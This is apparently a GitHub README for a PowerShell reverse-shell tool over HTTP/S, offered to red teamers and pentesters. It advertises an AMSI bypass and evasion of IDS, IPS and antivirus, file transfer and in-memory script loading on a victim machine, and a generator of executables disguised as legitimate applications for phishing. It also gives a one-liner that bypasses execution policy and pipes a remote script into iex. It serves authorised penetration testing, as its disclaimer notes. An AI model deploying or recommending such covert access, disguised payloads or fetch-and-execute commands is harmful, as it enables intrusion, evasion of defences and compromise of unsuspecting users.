# HTTPS-RevShell-PS3

Revshell focused on red teams and pentesters with AMSI Bypass. This tool provides a reverse connection through the http/s protocol. It uses a covert channel to gain control over the victim machine through web requests and thus evade solutions such as IDS, IPS and AV.

## Original Author
This work is mosty entirely @3v4Si0N very well done job. I have made some customizations to make the code work in a few other scenarios than what was intened.
ALL CREDITS OF THIS PROJECT GOES TO 3v4Si0N and his amazing work. You should fork his project rather than this: https://github.com/3v4Si0N/HTTP-revshell/

# Features

    SSL
    Proxy Aware
    Upload files
    Download files
    Load powershell scripts through the server
    Error Control
    AMSI bypass
    Autocomplete PowerShell functions (optional)
    
    
# Server usage:
```
usage: server.py [-h] [--ssl] [--autocomplete] host port

Process some integers.

positional arguments:
  host            Listen Host
  port            Listen Port

optional arguments:
  -h, --help      show this help message and exit
  --ssl           Send traffic over ssl
  --autocomplete  Autocomplete powershell functions
```

## Help Invoke-WebRev.ps1 (client)
Client usage:
```
Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]
```


# Extra functions usage
## Upload

This function allow you to upload any file to the victim machine.

Usage:

`upload /src/path/file C:\dest\path\file`

## Download

This function allow you to download a file to the attacker machine.

Usage:

`download C:\src\path\file /dst/path/file`

## Loadps1

This function allows you to load from powershell scripts without having to write to the victim's disk, reading the file through legitimate HTTP traffic.

Usage:

`loadps1 /path/to/the/local/server/PowershellScript.ps1`


# Help Revshell-Generator.ps1 (Automatic Payload Generator)

This script allows you to create an executable file with the payload necessary to use HTTP-revshell, you just need to follow the instructions on the screen to generate it. There are 6 predefined templates and a customizable one, with the data that you like.

The payloads generated by the tool, incorporate the legitimate icon of the application, as well as the product and copyright information of the original application. In addition, each of them opens the original application before establishing the connection with the server, pretending to be a legitimate application. This can be used for phishing or Red Team exercises.

Payload Generator usage:

`powershell -ep bypass "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"`

# Credits

    JoelGMSec for his awesome Revshell-Generator.ps1. Twitter: @JoelGMSec
    

# Disclaimer & License

This script is licensed under LGPLv3+. Direct link to License.

HTTP-revshell should be used for authorized penetration testing and/or nonprofit educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own servers and/or with the server owner's permission.

## Original Author
This work is mosty entirely @3v4Si0N very well done job. I have made some customizations to make the code work in a few other scenarios than what was intened.
ALL CREDITS OF THIS PROJECT GOES TO 3v4Si0N and his amazing work. You should fork his project rather than this: https://github.com/3v4Si0N/HTTP-revshell/
